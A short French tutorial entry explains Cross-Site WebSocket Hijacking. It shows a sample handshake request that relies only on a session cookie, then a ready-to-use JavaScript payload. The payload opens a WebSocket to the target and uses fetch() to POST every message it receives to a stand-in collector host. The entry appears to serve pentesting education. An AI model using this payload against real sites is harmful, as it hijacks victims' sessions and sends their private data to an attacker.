L’attaque Cross-Site WebSocket Hijacking est possible quand le WebSocket Handshake est vulnérable au CSRF. En effet, le canal de communication entre les deux parties (client/serveur) se crée en fonction de l’origine de la demande d’ouverture. Ainsi, si la demande de changement de protocole ne se base que sur les cookies, un attaquant peut alors piéger une victime afin qu’elle initie une demande avec sa session mais sur le serveur de l’attaquant.

Exemple

GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket

Dans cette requête, on voit que le seul élément permettant d'établir une session entre le client et le serveur est le cookie "session" laissant penser qu'il est fortement probable qu'il n'existe pas de protection contre les CSWSH.

Exploitation

<script>
    var ws = new WebSocket('wss://target.com/endpoint');
    ws.onopen = function() {
        ws.send("<start message>");
    };
    ws.onmessage = function(event) {
        fetch('https://your-burp.collab.com', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>